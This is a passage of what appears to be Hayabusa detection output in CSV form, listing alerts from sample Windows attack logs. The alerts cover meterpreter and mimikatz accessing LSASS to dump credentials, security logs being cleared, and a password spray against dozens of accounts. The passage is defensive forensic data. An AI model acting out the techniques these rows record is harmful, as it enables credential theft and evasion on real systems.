+09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 
+09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 
+09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 
0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 
TargetUserName:celgee/mtoussain/psmith/jleytevidal/sanson/eskoudis/edygert/drook/cragoso/tbennett/bking/cdavis/ebooth/ssims/cfleener/jwright/jlake/thessman/econrad/jorchilles/bgreenwood/zmathis/rbowes/Administrator/bhostetler/sarmstrong/lpesce/lschifano/dpendolino/kperryman/jkulikowski/wstrzelec/mdouglas/gsalinas/baker/smisenar/dmashburn/bgalbraith/cspizor/cmoody/melliott IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: 
eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc 
| LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 
+2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: 
jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 
04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: 
bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
